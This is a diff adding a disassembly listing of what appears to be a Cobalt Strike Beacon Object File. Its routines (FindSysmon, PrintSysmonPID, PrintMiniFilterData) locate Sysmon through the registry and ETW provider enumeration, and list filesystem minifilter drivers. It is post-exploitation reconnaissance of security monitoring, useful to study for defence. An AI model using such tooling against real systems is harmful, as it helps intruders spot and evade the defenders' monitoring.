+  00000000000003EC: C6 84 24 8F 00 00  mov         byte ptr [rsp+8Fh],46h
+                    00 46
+  00000000000003F4: C7 84 24 90 00 00  mov         dword ptr [rsp+90h],3837533h
+                    00 33 75 83 03
+  00000000000003FF: B8 8B 09 00 00     mov         eax,98Bh
+  0000000000000404: 66 89 84 24 94 00  mov         word ptr [rsp+94h],ax
+                    00 00
+  000000000000040C: B8 D8 11 00 00     mov         eax,11D8h
+  0000000000000411: 66 89 84 24 96 00  mov         word ptr [rsp+96h],ax
+                    00 00
+  0000000000000419: C6 84 24 98 00 00  mov         byte ptr [rsp+98h],94h
+                    00 94
+  0000000000000421: C6 84 24 99 00 00  mov         byte ptr [rsp+99h],14h
+                    00 14
+  0000000000000429: C6 84 24 9A 00 00  mov         byte ptr [rsp+9Ah],50h
+                    00 50
+  0000000000000431: C6 84 24 9B 00 00  mov         byte ptr [rsp+9Bh],50h
+                    00 50
+  0000000000000439: C6 84 24 9C 00 00  mov         byte ptr [rsp+9Ch],54h
+                    00 54
+  0000000000000441: C6 84 24 9D 00 00  mov         byte ptr [rsp+9Dh],50h
+                    00 50
+  0000000000000449: C6 84 24 9E 00 00  mov         byte ptr [rsp+9Eh],30h
+                    00 30
+  0000000000000451: C6 84 24 9F 00 00  mov         byte ptr [rsp+9Fh],30h
+                    00 30
+  0000000000000459: C7 44 24 4C 00 00  mov         dword ptr [rsp+4Ch],0
+                    00 00
+  0000000000000461: 33 D2              xor         edx,edx
+  0000000000000463: 33 C9              xor         ecx,ecx
+  0000000000000465: FF 15 00 00 00 00  call        qword ptr [__imp_OLE32$CoInitializeEx]
+  000000000000046B: 89 44 24 30        mov         dword ptr [rsp+30h],eax
+  000000000000046F: 83 7C 24 30 00     cmp         dword ptr [rsp+30h],0
+  0000000000000474: 7D 07              jge         000000000000047D
+  0000000000000476: 33 C0              xor         eax,eax
+  0000000000000478: E9 55 02 00 00     jmp         00000000000006D2
+  000000000000047D: 48 8D 44 24 40     lea         rax,[rsp+40h]
+  0000000000000482: 48 89 44 24 20     mov         qword ptr [rsp+20h],rax
+  0000000000000487: 4C 8D 4C 24 60     lea         r9,[rsp+60h]
+  000000000000048C: 41 B8 01 00 00 00  mov         r8d,1
+  0000000000000492: 33 D2              xor         edx,edx
+  0000000000000494: 48 8D 4C 24 70     lea         rcx,[rsp+70h]
+  0000000000000499: FF 15 00 00 00 00  call        qword ptr [__imp_OLE32$CoCreateInstance]
+  000000000000049F: 89 44 24 30        mov         dword ptr [rsp+30h],eax
+  00000000000004A3: 83 7C 24 30 00     cmp         dword ptr [rsp+30h],0
+  00000000000004A8: 7D 17              jge         00000000000004C1
+  00000000000004AA: 44 8B 44 24 30     mov         r8d,dword ptr [rsp+30h]
+  00000000000004AF: 48 8D 15 00 00 00  lea         rdx,[$SG105178]
+                    00
+  00000000000004B6: B9 0D 00 00 00     mov         ecx,0Dh
+  00000000000004BB: FF 15 00 00 00 00  call        qword ptr [__imp_BeaconPrintf]
+  00000000000004C1: 48 8B 44 24 40     mov         rax,qword ptr [rsp+40h]
+  00000000000004C6: 48 8B 00           mov         rax,qword ptr [rax]
+  00000000000004C9: 45 33 C0           xor         r8d,r8d
+  00000000000004CC: 48 8B 94 24 F0 00  mov         rdx,qword ptr [rsp+0F0h]
+                    00 00
+  00000000000004D4: 48 8B 4C 24 40     mov         rcx,qword ptr [rsp+40h]
+  00000000000004D9: FF 90 A8 00 00 00  call        qword ptr [rax+0A8h]
+  00000000000004DF: 89 44 24 30        mov         dword ptr [rsp+30h],eax
+  00000000000004E3: 83 7C 24 30 00     cmp         dword ptr [rsp+30h],0
+  00000000000004E8: 7D 17              jge         0000000000000501
+  00000000000004EA: 44 8B 44 24 30     mov         r8d,dword ptr [rsp+30h]
+  00000000000004EF: 48 8D 15 00 00 00  lea         rdx,[$SG105180]
+                    00
+  00000000000004F6: B9 0D 00 00 00     mov         ecx,0Dh
+  00000000000004FB: FF 15 00 00 00 00  call        qword ptr [__imp_BeaconPrintf]
+  0000000000000501: 48 C7 44 24 38 00  mov         qword ptr [rsp+38h],0
+                    00 00 00
+  000000000000050A: 48 8B 44 24 40     mov         rax,qword ptr [rsp+40h]
+  000000000000050F: 48 8B 00           mov         rax,qword ptr [rax]
+  0000000000000512: 48 8D 54 24 38     lea         rdx,[rsp+38h]
+  0000000000000517: 48 8B 4C 24 40     mov         rcx,qword ptr [rsp+40h]
+  000000000000051C: FF 90 C8 00 00 00  call        qword ptr [rax+0C8h]
+  0000000000000522: 89 44 24 30        mov         dword ptr [rsp+30h],eax
+  0000000000000526: 83 7C 24 30 00     cmp         dword ptr [rsp+30h],0
+  000000000000052B: 0F 85 77 01 00 00  jne         00000000000006A8
+  0000000000000531: C7 44 24 48 00 00  mov         dword ptr [rsp+48h],0
+                    00 00
+  0000000000000539: 48 8B 44 24 38     mov         rax,qword ptr [rsp+38h]
+  000000000000053E: 48 8B 00           mov         rax,qword ptr [rax]
+  0000000000000541: 48 8D 54 24 48     lea         rdx,[rsp+48h]
+  0000000000000546: 48 8B 4C 24 38     mov         rcx,qword ptr [rsp+38h]
+  000000000000054B: FF 50 38           call        qword ptr [rax+38h]
+  000000000000054E: 89 44 24 30        mov         dword ptr [rsp+30h],eax
+  0000000000000552: 83 7C 24 48 00     cmp         dword ptr [rsp+48h],0
+  0000000000000557: 0F 8E 4B 01 00 00  jle         00000000000006A8
+  000000000000055D: 48 C7 44 24 50 00  mov         qword ptr [rsp+50h],0
+                    00 00 00
+  0000000000000566: 48 8B 44 24 38     mov         rax,qword ptr [rsp+38h]
+  000000000000056B: 48 8B 00           mov         rax,qword ptr [rax]
+  000000000000056E: 48 8D 54 24 50     lea         rdx,[rsp+50h]
+  0000000000000573: 48 8B 4C 24 38     mov         rcx,qword ptr [rsp+38h]
+  0000000000000578: FF 50 48           call        qword ptr [rax+48h]
+  000000000000057B: 89 44 24 30        mov         dword ptr [rsp+30h],eax
+  000000000000057F: 48 C7 84 24 A0 00  mov         qword ptr [rsp+0A0h],0
+                    00 00 00 00 00 00
+  000000000000058B: 48 8B 44 24 50     mov         rax,qword ptr [rsp+50h]
+  0000000000000590: 48 8B 00           mov         rax,qword ptr [rax]
+  0000000000000593: 4C 8D 84 24 A0 00  lea         r8,[rsp+0A0h]
+                    00 00
+  000000000000059B: 48 8D 94 24 80 00  lea         rdx,[rsp+80h]
+                    00 00
+  00000000000005A3: 48 8B 4C 24 50     mov         rcx,qword ptr [rsp+50h]
+  00000000000005A8: FF 10              call        qword ptr [rax]
+  00000000000005AA: 89 44 24 30        mov         dword ptr [rsp+30h],eax
+  00000000000005AE: 48 8B 44 24 50     mov         rax,qword ptr [rsp+50h]
+  00000000000005B3: 48 8B 00           mov         rax,qword ptr [rax]
+  00000000000005B6: 48 8B 4C 24 50     mov         rcx,qword ptr [rsp+50h]
+  00000000000005BB: FF 50 10           call        qword ptr [rax+10h]
+  00000000000005BE: 48 8D 8C 24 C0 00  lea         rcx,[rsp+0C0h]
+                    00 00
+  00000000000005C6: FF 15 00 00 00 00  call        qword ptr [__imp_OLEAUT32$VariantInit]
+  00000000000005CC: 48 8D 8C 24 A8 00  lea         rcx,[rsp+0A8h]
+                    00 00
+  00000000000005D4: FF 15 00 00 00 00  call        qword ptr [__imp_OLEAUT32$VariantInit]
+  00000000000005DA: 48 C7 44 24 58 00  mov         qword ptr [rsp+58h],0
+                    00 00 00
+  00000000000005E3: 48 8B 84 24 A0 00  mov         rax,qword ptr [rsp+0A0h]
+                    00 00
+  00000000000005EB: 48 8B 00           mov         rax,qword ptr [rax]
+  00000000000005EE: 45 33 C9           xor         r9d,r9d
+  00000000000005F1: 4C 8D 84 24 C0 00  lea         r8,[rsp+0C0h]
+                    00 00
+  00000000000005F9: BA 01 00 00 00     mov         edx,1
+  00000000000005FE: 48 8B 8C 24 A0 00  mov         rcx,qword ptr [rsp+0A0h]
+                    00 00
+  0000000000000606: FF 50 18           call        qword ptr [rax+18h]
+  0000000000000609: 89 44 24 30        mov         dword ptr [rsp+30h],eax
+  000000000000060D: 83 7C 24 30 00     cmp         dword ptr [rsp+30h],0
+  0000000000000612: 0F 85 90 00 00 00  jne         00000000000006A8
+  0000000000000618: 48 8B 84 24 C8 00  mov         rax,qword ptr [rsp+0C8h]
+                    00 00
+  0000000000000620: 48 8B 00           mov         rax,qword ptr [rax]
+  0000000000000623: 4C 8D 44 24 58     lea         r8,[rsp+58h]
+  0000000000000628: 48 8D 94 24 90 00  lea         rdx,[rsp+90h]
+                    00 00
+  0000000000000630: 48 8B 8C 24 C8 00  mov         rcx,qword ptr [rsp+0C8h]
+                    00 00
+  0000000000000638: FF 10              call        qword ptr [rax]
+  000000000000063A: 48 8B 44 24 58     mov         rax,qword ptr [rsp+58h]
+  000000000000063F: 48 8B 00           mov         rax,qword ptr [rax]
+  0000000000000642: 48 8D 94 24 A8 00  lea         rdx,[rsp+0A8h]
+                    00 00
+  000000000000064A: 48 8B 4C 24 58     mov         rcx,qword ptr [rsp+58h]
+  000000000000064F: FF 50 68           call        qword ptr [rax+68h]
+  0000000000000652: 83 BC 24 B0 00 00  cmp         dword ptr [rsp+0B0h],0
+                    00 00
+  000000000000065A: 74 1B              je          0000000000000677
+  000000000000065C: 8B 94 24 B0 00 00  mov         edx,dword ptr [rsp+0B0h]
+                    00
+  0000000000000663: 48 8D 0D 00 00 00  lea         rcx,[$SG105184]
+                    00
+  000000000000066A: E8 00 00 00 00     call        BeaconPrintToStreamW
+  000000000000066F: C7 44 24 4C 01 00  mov         dword ptr [rsp+4Ch],1
+                    00 00
+  0000000000000677: 48 8D 8C 24 A8 00  lea         rcx,[rsp+0A8h]
+                    00 00
+  000000000000067F: FF 15 00 00 00 00  call        qword ptr [__imp_OLEAUT32$VariantClear]
+  0000000000000685: 48 8B 44 24 58     mov         rax,qword ptr [rsp+58h]
+  000000000000068A: 48 8B 00           mov         rax,qword ptr [rax]
+  000000000000068D: 48 8B 4C 24 58     mov         rcx,qword ptr [rsp+58h]
+  0000000000000692: FF 50 10           call        qword ptr [rax+10h]
+  0000000000000695: 48 8D 8C 24 C0 00  lea         rcx,[rsp+0C0h]
+                    00 00
+  000000000000069D: FF 15 00 00 00 00  call        qword ptr [__imp_OLEAUT32$VariantClear]
+  00000000000006A3: E9 3B FF FF FF     jmp         00000000000005E3
+  00000000000006A8: 48 8B 44 24 38     mov         rax,qword ptr [rsp+38h]
+  00000000000006AD: 48 8B 00           mov         rax,qword ptr [rax]
+  00000000000006B0: 48 8B 4C 24 38     mov         rcx,qword ptr [rsp+38h]
+  00000000000006B5: FF 50 10           call        qword ptr [rax+10h]
+  00000000000006B8: 48 8B 44 24 40     mov         rax,qword ptr [rsp+40h]
+  00000000000006BD: 48 8B 00           mov         rax,qword ptr [rax]
+  00000000000006C0: 48 8B 4C 24 40     mov         rcx,qword ptr [rsp+40h]
+  00000000000006C5: FF 50 10           call        qword ptr [rax+10h]
+  00000000000006C8: FF 15 00 00 00 00  call        qword ptr [__imp_OLE32$CoUninitialize]
+  00000000000006CE: 8B 44 24 4C        mov         eax,dword ptr [rsp+4Ch]
+  00000000000006D2: 48 81 C4 E8 00 00  add         rsp,0E8h
+                    00
+  00000000000006D9: C3                 ret
+  00000000000006DA: CC                 int         3
+  00000000000006DB: CC                 int         3
+  00000000000006DC: CC                 int         3
+  00000000000006DD: CC                 int         3
+  00000000000006DE: CC                 int         3
+  00000000000006DF: CC                 int         3
+FindSysmon:
+  00000000000006E0: 48 81 EC E8 02 00  sub         rsp,2E8h
+                    00
+  00000000000006E7: C7 44 24 4C 00 00  mov         dword ptr [rsp+4Ch],0
+                    00 00
+  00000000000006EF: 48 C7 44 24 40 00  mov         qword ptr [rsp+40h],0
+                    00 00 00
+  00000000000006F8: 48 C7 44 24 70 00  mov         qword ptr [rsp+70h],0
+                    00 00 00
+  0000000000000701: C7 44 24 50 00 00  mov         dword ptr [rsp+50h],0
+                    00 00
+  0000000000000709: C7 44 24 64 00 00  mov         dword ptr [rsp+64h],0
+                    00 00
+  0000000000000711: C7 44 24 60 E8 FD  mov         dword ptr [rsp+60h],0FDE8h
+                    00 00
+  0000000000000719: 48 C7 44 24 58 00  mov         qword ptr [rsp+58h],0
+                    00 00 00
+  0000000000000722: C7 44 24 68 00 00  mov         dword ptr [rsp+68h],0
+                    00 00
+  000000000000072A: 48 8D 44 24 78     lea         rax,[rsp+78h]
+  000000000000072F: 48 89 44 24 20     mov         qword ptr [rsp+20h],rax
+  0000000000000734: 41 B9 19 00 02 00  mov         r9d,20019h
+  000000000000073A: 45 33 C0           xor         r8d,r8d
+  000000000000073D: 48 8D 15 00 00 00  lea         rdx,[$SG105226]
+                    00
+  0000000000000744: 48 C7 C1 02 00 00  mov         rcx,0FFFFFFFF80000002h
+                    80
+  000000000000074B: FF 15 00 00 00 00  call        qword ptr [__imp_ADVAPI32$RegOpenKeyExA]
+  0000000000000751: 85 C0              test        eax,eax
+  0000000000000753: 0F 85 CD 00 00 00  jne         0000000000000826
+  0000000000000759: 8B 44 24 60        mov         eax,dword ptr [rsp+60h]
+  000000000000075D: 48 89 84 24 88 00  mov         qword ptr [rsp+88h],rax
+                    00 00
+  0000000000000765: FF 15 00 00 00 00  call        qword ptr [__imp_KERNEL32$GetProcessHeap]
+  000000000000076B: 48 8B 8C 24 88 00  mov         rcx,qword ptr [rsp+88h]
+                    00 00
+  0000000000000773: 4C 8B C1           mov         r8,rcx
+  0000000000000776: BA 08 00 00 00     mov         edx,8
+  000000000000077B: 48 8B C8           mov         rcx,rax
+  000000000000077E: FF 15 00 00 00 00  call        qword ptr [__imp_KERNEL32$HeapAlloc]
+  0000000000000784: 48 89 44 24 58     mov         qword ptr [rsp+58h],rax
+  0000000000000789: 48 83 7C 24 58 00  cmp         qword ptr [rsp+58h],0
+  000000000000078F: 75 07              jne         0000000000000798
+  0000000000000791: 33 C0              xor         eax,eax
+  0000000000000793: E9 7A 02 00 00     jmp         0000000000000A12
+  0000000000000798: 48 8D 44 24 60     lea         rax,[rsp+60h]
+  000000000000079D: 48 89 44 24 30     mov         qword ptr [rsp+30h],rax
+  00000000000007A2: 48 8B 44 24 58     mov         rax,qword ptr [rsp+58h]
+  00000000000007A7: 48 89 44 24 28     mov         qword ptr [rsp+28h],rax
+  00000000000007AC: 48 8D 84 24 80 00  lea         rax,[rsp+80h]
+                    00 00
+  00000000000007B4: 48 89 44 24 20     mov         qword ptr [rsp+20h],rax
+  00000000000007B9: 41 B9 FF FF 00 00  mov         r9d,0FFFFh
+  00000000000007BF: 4C 8D 05 00 00 00  lea         r8,[$SG105229]
+                    00
+  00000000000007C6: 33 D2              xor         edx,edx
+  00000000000007C8: 48 8B 4C 24 78     mov         rcx,qword ptr [rsp+78h]
+  00000000000007CD: FF 15 00 00 00 00  call        qword ptr [__imp_ADVAPI32$RegGetValueA]
+  00000000000007D3: 85 C0              test        eax,eax
+  00000000000007D5: 74 07              je          00000000000007DE
+  00000000000007D7: 33 C0              xor         eax,eax
+  00000000000007D9: E9 34 02 00 00     jmp         0000000000000A12
+  00000000000007DE: 48 8B 4C 24 58     mov         rcx,qword ptr [rsp+58h]
+  00000000000007E3: FF 15 00 00 00 00  call        qword ptr [__imp_MSVCRT$strlen]
+  00000000000007E9: 48 85 C0           test        rax,rax
+  00000000000007EC: 74 2F              je          000000000000081D
+  00000000000007EE: C7 44 24 28 00 01  mov         dword ptr [rsp+28h],100h
+                    00 00
+  00000000000007F6: 48 8D 84 24 E0 00  lea         rax,[rsp+0E0h]
+                    00 00
+  00000000000007FE: 48 89 44 24 20     mov         qword ptr [rsp+20h],rax
+  0000000000000803: 41 B9 FF FF FF FF  mov         r9d,0FFFFFFFFh
+  0000000000000809: 4C 8B 44 24 58     mov         r8,qword ptr [rsp+58h]
+  000000000000080E: 33 D2              xor         edx,edx
+  0000000000000810: B9 E9 FD 00 00     mov         ecx,0FDE9h
+  0000000000000815: FF 15 00 00 00 00  call        qword ptr [__imp_KERNEL32$MultiByteToWideChar]
+  000000000000081B: EB 07              jmp         0000000000000824
+  000000000000081D: 33 C0              xor         eax,eax
+  000000000000081F: E9 EE 01 00 00     jmp         0000000000000A12
+  0000000000000824: EB 07              jmp         000000000000082D
+  0000000000000826: 33 C0              xor         eax,eax
+  0000000000000828: E9 E5 01 00 00     jmp         0000000000000A12
+  000000000000082D: 48 83 7C 24 58 00  cmp         qword ptr [rsp+58h],0
+  0000000000000833: 74 16              je          000000000000084B
+  0000000000000835: FF 15 00 00 00 00  call        qword ptr [__imp_KERNEL32$GetProcessHeap]
+  000000000000083B: 4C 8B 44 24 58     mov         r8,qword ptr [rsp+58h]
+  0000000000000840: 33 D2              xor         edx,edx
+  0000000000000842: 48 8B C8           mov         rcx,rax
+  0000000000000845: FF 15 00 00 00 00  call        qword ptr [__imp_KERNEL32$HeapFree]
+  000000000000084B: 48 8B 4C 24 78     mov         rcx,qword ptr [rsp+78h]
+  0000000000000850: FF 15 00 00 00 00  call        qword ptr [__imp_ADVAPI32$RegCloseKey]
+  0000000000000856: 48 8D 54 24 50     lea         rdx,[rsp+50h]
+  000000000000085B: 48 8B 4C 24 40     mov         rcx,qword ptr [rsp+40h]
+  0000000000000860: FF 15 00 00 00 00  call        qword ptr [__imp_TDH$TdhEnumerateProviders]
+  0000000000000866: 89 44 24 4C        mov         dword ptr [rsp+4Ch],eax
+  000000000000086A: 83 7C 24 4C 7A     cmp         dword ptr [rsp+4Ch],7Ah
+  000000000000086F: 75 4E              jne         00000000000008BF
+  0000000000000871: 8B 44 24 50        mov         eax,dword ptr [rsp+50h]
+  0000000000000875: 8B D0              mov         edx,eax
+  0000000000000877: 48 8B 4C 24 40     mov         rcx,qword ptr [rsp+40h]
+  000000000000087C: FF 15 00 00 00 00  call        qword ptr [__imp_MSVCRT$realloc]
+  0000000000000882: 48 89 44 24 70     mov         qword ptr [rsp+70h],rax
+  0000000000000887: 48 83 7C 24 70 00  cmp         qword ptr [rsp+70h],0
+  000000000000088D: 75 07              jne         0000000000000896
+  000000000000088F: 33 C0              xor         eax,eax
+  0000000000000891: E9 7C 01 00 00     jmp         0000000000000A12
+  0000000000000896: 48 8B 44 24 70     mov         rax,qword ptr [rsp+70h]
+  000000000000089B: 48 89 44 24 40     mov         qword ptr [rsp+40h],rax
+  00000000000008A0: 48 C7 44 24 70 00  mov         qword ptr [rsp+70h],0
+                    00 00 00
+  00000000000008A9: 48 8D 54 24 50     lea         rdx,[rsp+50h]
+  00000000000008AE: 48 8B 4C 24 40     mov         rcx,qword ptr [rsp+40h]
+  00000000000008B3: FF 15 00 00 00 00  call        qword ptr [__imp_TDH$TdhEnumerateProviders]
+  00000000000008B9: 89 44 24 4C        mov         dword ptr [rsp+4Ch],eax
+  00000000000008BD: EB AB              jmp         000000000000086A
+  00000000000008BF: 83 7C 24 4C 00     cmp         dword ptr [rsp+4Ch],0
+  00000000000008C4: 74 17              je          00000000000008DD
+  00000000000008C6: 48 8D 15 00 00 00  lea         rdx,[$SG105236]
+                    00
+  00000000000008CD: B9 0D 00 00 00     mov         ecx,0Dh
+  00000000000008D2: FF 15 00 00 00 00  call        qword ptr [__imp_BeaconPrintf]
+  00000000000008D8: E9 17 01 00 00     jmp         00000000000009F4
+  00000000000008DD: C7 44 24 48 00 00  mov         dword ptr [rsp+48h],0
+                    00 00
+  00000000000008E5: EB 0A              jmp         00000000000008F1
+  00000000000008E7: 8B 44 24 48        mov         eax,dword ptr [rsp+48h]
+  00000000000008EB: FF C0              inc         eax
+  00000000000008ED: 89 44 24 48        mov         dword ptr [rsp+48h],eax
+  00000000000008F1: 48 8B 44 24 40     mov         rax,qword ptr [rsp+40h]
+  00000000000008F6: 8B 00              mov         eax,dword ptr [rax]
+  00000000000008F8: 39 44 24 48        cmp         dword ptr [rsp+48h],eax
+  00000000000008FC: 0F 83 F2 00 00 00  jae         00000000000009F4
+  0000000000000902: 8B 44 24 48        mov         eax,dword ptr [rsp+48h]
+  0000000000000906: 48 6B C0 18        imul        rax,rax,18h
+  000000000000090A: 48 8B 4C 24 40     mov         rcx,qword ptr [rsp+40h]
+  000000000000090F: 48 8D 44 01 08     lea         rax,[rcx+rax+8]
+  0000000000000914: 41 B8 27 00 00 00  mov         r8d,27h
+  000000000000091A: 48 8D 94 24 90 00  lea         rdx,[rsp+90h]
+                    00 00
+  0000000000000922: 48 8B C8           mov         rcx,rax
+  0000000000000925: FF 15 00 00 00 00  call        qword ptr [__imp_OLE32$StringFromGUID2]
+  000000000000092B: 89 44 24 64        mov         dword ptr [rsp+64h],eax
+  000000000000092F: 83 7C 24 64 00     cmp         dword ptr [rsp+64h],0
+  0000000000000934: 7D 07              jge         000000000000093D
+  0000000000000936: 33 C0              xor         eax,eax
+  0000000000000938: E9 D5 00 00 00     jmp         0000000000000A12
+  000000000000093D: 48 8D 94 24 E0 00  lea         rdx,[rsp+0E0h]
+                    00 00
+  0000000000000945: 48 8D 8C 24 90 00  lea         rcx,[rsp+90h]
+                    00 00
+  000000000000094D: FF 15 00 00 00 00  call        qword ptr [__imp_MSVCRT$_wcsicmp]
+  0000000000000953: 85 C0              test        eax,eax
+  0000000000000955: 0F 85 94 00 00 00  jne         00000000000009EF
+  000000000000095B: 48 8D 0D 00 00 00  lea         rcx,[$SG105239]
+                    00
+  0000000000000962: E8 00 00 00 00     call        BeaconPrintToStreamW
+  0000000000000967: 48 8D 8C 24 E0 00  lea         rcx,[rsp+0E0h]
+                    00 00
+  000000000000096F: E8 00 00 00 00     call        PrintSysmonPID
+  0000000000000974: 89 44 24 68        mov         dword ptr [rsp+68h],eax
+  0000000000000978: 83 7C 24 68 00     cmp         dword ptr [rsp+68h],0
+  000000000000097D: 75 0E              jne         000000000000098D
+  000000000000097F: 48 8D 0D 00 00 00  lea         rcx,[$SG105242]
+                    00
+  0000000000000986: E8 00 00 00 00     call        BeaconPrintToStreamW
+  000000000000098B: EB 0C              jmp         0000000000000999
+  000000000000098D: 48 8D 0D 00 00 00  lea         rcx,[$SG105243]
+                    00
+  0000000000000994: E8 00 00 00 00     call        BeaconPrintToStreamW
+  0000000000000999: 8B 44 24 48        mov         eax,dword ptr [rsp+48h]
+  000000000000099D: 48 6B C0 18        imul        rax,rax,18h
+  00000000000009A1: 48 8B 4C 24 40     mov         rcx,qword ptr [rsp+40h]
+  00000000000009A6: 8B 44 01 1C        mov         eax,dword ptr [rcx+rax+1Ch]
+  00000000000009AA: 48 8B 4C 24 40     mov         rcx,qword ptr [rsp+40h]
+  00000000000009AF: 48 03 C8           add         rcx,rax
+  00000000000009B2: 48 8B C1           mov         rax,rcx
+  00000000000009B5: 4C 8D 84 24 90 00  lea         r8,[rsp+90h]
+                    00 00
+  00000000000009BD: 48 8B D0           mov         rdx,rax
+  00000000000009C0: 48 8D 0D 00 00 00  lea         rcx,[$SG105244]
+                    00
+  00000000000009C7: E8 00 00 00 00     call        BeaconPrintToStreamW
+  00000000000009CC: 48 83 7C 24 40 00  cmp         qword ptr [rsp+40h],0
+  00000000000009D2: 74 14              je          00000000000009E8
+  00000000000009D4: 48 8B 4C 24 40     mov         rcx,qword ptr [rsp+40h]
+  00000000000009D9: FF 15 00 00 00 00  call        qword ptr [__imp_MSVCRT$free]
+  00000000000009DF: 48 C7 44 24 40 00  mov         qword ptr [rsp+40h],0
+                    00 00 00
+  00000000000009E8: B8 01 00 00 00     mov         eax,1
+  00000000000009ED: EB 23              jmp         0000000000000A12
+  00000000000009EF: E9 F3 FE FF FF     jmp         00000000000008E7
+  00000000000009F4: 48 83 7C 24 40 00  cmp         qword ptr [rsp+40h],0
+  00000000000009FA: 74 14              je          0000000000000A10
+  00000000000009FC: 48 8B 4C 24 40     mov         rcx,qword ptr [rsp+40h]
+  0000000000000A01: FF 15 00 00 00 00  call        qword ptr [__imp_MSVCRT$free]
+  0000000000000A07: 48 C7 44 24 40 00  mov         qword ptr [rsp+40h],0
+                    00 00 00
+  0000000000000A10: 33 C0              xor         eax,eax
+  0000000000000A12: 48 81 C4 E8 02 00  add         rsp,2E8h
+                    00
+  0000000000000A19: C3                 ret
+  0000000000000A1A: CC                 int         3
+  0000000000000A1B: CC                 int         3
+  0000000000000A1C: CC                 int         3
+  0000000000000A1D: CC                 int         3
+  0000000000000A1E: CC                 int         3
+  0000000000000A1F: CC                 int         3
+PrintMiniFilterData:
+  0000000000000A20: 48 89 4C 24 08     mov         qword ptr [rsp+8],rcx
+  0000000000000A25: 48 83 EC 58        sub         rsp,58h
+  0000000000000A29: 48 C7 44 24 28 00  mov         qword ptr [rsp+28h],0
+                    00 00 00
+  0000000000000A32: 48 8B 44 24 60     mov         rax,qword ptr [rsp+60h]
+  0000000000000A37: 48 89 44 24 28     mov         qword ptr [rsp+28h],rax
+  0000000000000A3C: 48 8B 44 24 28     mov         rax,qword ptr [rsp+28h]
+  0000000000000A41: 0F B7 40 14        movzx       eax,word ptr [rax+14h]
+  0000000000000A45: 89 44 24 20        mov         dword ptr [rsp+20h],eax
+  0000000000000A49: 48 8B 44 24 28     mov         rax,qword ptr [rsp+28h]
+  0000000000000A4E: 0F B7 40 16        movzx       eax,word ptr [rax+16h]
+  0000000000000A52: 48 8B 4C 24 60     mov         rcx,qword ptr [rsp+60h]
+  0000000000000A57: 48 03 C8           add         rcx,rax
+  0000000000000A5A: 48 8B C1           mov         rax,rcx
+  0000000000000A5D: 48 89 44 24 40     mov         qword ptr [rsp+40h],rax
+  0000000000000A62: 8B 44 24 20        mov         eax,dword ptr [rsp+20h]
+  0000000000000A66: 83 C0 02           add         eax,2
+  0000000000000A69: 48 98              cdqe
+  0000000000000A6B: 48 8B C8           mov         rcx,rax
+  0000000000000A6E: FF 15 00 00 00 00  call        qword ptr [__imp_MSVCRT$malloc]
+  0000000000000A74: 48 89 44 24 30     mov         qword ptr [rsp+30h],rax
+  0000000000000A79: 8B 44 24 20        mov         eax,dword ptr [rsp+20h]
+  0000000000000A7D: 83 C0 02           add         eax,2
+  0000000000000A80: 48 98              cdqe
+  0000000000000A82: 4C 8B C0           mov         r8,rax
+  0000000000000A85: 33 D2              xor         edx,edx
+  0000000000000A87: 48 8B 4C 24 30     mov         rcx,qword ptr [rsp+30h]
+  0000000000000A8C: FF 15 00 00 00 00  call        qword ptr [__imp_MSVCRT$memset]
+  0000000000000A92: 48 63 44 24 20     movsxd      rax,dword ptr [rsp+20h]
+  0000000000000A97: 4C 8B C0           mov         r8,rax
+  0000000000000A9A: 48 8B 54 24 40     mov         rdx,qword ptr [rsp+40h]
+  0000000000000A9F: 48 8B 4C 24 30     mov         rcx,qword ptr [rsp+30h]
+  0000000000000AA4: FF 15 00 00 00 00  call        qword ptr [__imp_MSVCRT$memcpy]
+  0000000000000AAA: 48 8B 44 24 28     mov         rax,qword ptr [rsp+28h]
+  0000000000000AAF: 0F B7 40 18        movzx       eax,word ptr [rax+18h]
+  0000000000000AB3: 89 44 24 24        mov         dword ptr [rsp+24h],eax
+  0000000000000AB7: 48 8B 44 24 28     mov         rax,qword ptr [rsp+28h]
+  0000000000000ABC: 0F B7 40 1A        movzx       eax,word ptr [rax+1Ah]
+  0000000000000AC0: 48 8B 4C 24 60     mov         rcx,qword ptr [rsp+60h]
+  0000000000000AC5: 48 03 C8           add         rcx,rax
+  0000000000000AC8: 48 8B C1           mov         rax,rcx
+  0000000000000ACB: 48 89 44 24 40     mov         qword ptr [rsp+40h],rax
+  0000000000000AD0: 8B 44 24 24        mov         eax,dword ptr [rsp+24h]
+  0000000000000AD4: 83 C0 02           add         eax,2
+  0000000000000AD7: 48 98              cdqe
+  0000000000000AD9: 48 8B C8           mov         rcx,rax
+  0000000000000ADC: FF 15 00 00 00 00  call        qword ptr [__imp_MSVCRT$malloc]
+  0000000000000AE2: 48 89 44 24 38     mov         qword ptr [rsp+38h],rax
+  0000000000000AE7: 8B 44 24 24        mov         eax,dword ptr [rsp+24h]
+  0000000000000AEB: 83 C0 02           add         eax,2
+  0000000000000AEE: 48 98              cdqe
+  0000000000000AF0: 4C 8B C0           mov         r8,rax
+  0000000000000AF3: 33 D2              xor         edx,edx
+  0000000000000AF5: 48 8B 4C 24 38     mov         rcx,qword ptr [rsp+38h]
+  0000000000000AFA: FF 15 00 00 00 00  call        qword ptr [__imp_MSVCRT$memset]
+  0000000000000B00: 48 63 44 24 24     movsxd      rax,dword ptr [rsp+24h]
+  0000000000000B05: 4C 8B C0           mov         r8,rax
+  0000000000000B08: 48 8B 54 24 40     mov         rdx,qword ptr [rsp+40h]
+  0000000000000B0D: 48 8B 4C 24 38     mov         rcx,qword ptr [rsp+38h]
+  0000000000000B12: FF 15 00 00 00 00  call        qword ptr [__imp_MSVCRT$memcpy]
+  0000000000000B18: 48 8B 44 24 28     mov         rax,qword ptr [rsp+28h]
+  0000000000000B1D: 83 78 04 01        cmp         dword ptr [rax+4],1
+  0000000000000B21: 75 1F              jne         0000000000000B42
+  0000000000000B23: 48 8B 44 24 28     mov         rax,qword ptr [rsp+28h]
+  0000000000000B28: 44 8B 48 10        mov         r9d,dword ptr [rax+10h]
+  0000000000000B2C: 4C 8B 44 24 38     mov         r8,qword ptr [rsp+38h]
+  0000000000000B31: 48 8B 54 24 30     mov         rdx,qword ptr [rsp+30h]
+  0000000000000B36: 48 8D 0D 00 00 00  lea         rcx,[$SG105266]
+                    00
+  0000000000000B3D: E8 00 00 00 00     call        BeaconPrintToStreamW
+  0000000000000B42: 48 8B 4C 24 30     mov         rcx,qword ptr [rsp+30h]
+  0000000000000B47: FF 15 00 00 00 00  call        qword ptr [__imp_MSVCRT$free]
+  0000000000000B4D: 48 8B 4C 24 38     mov         rcx,qword ptr [rsp+38h]
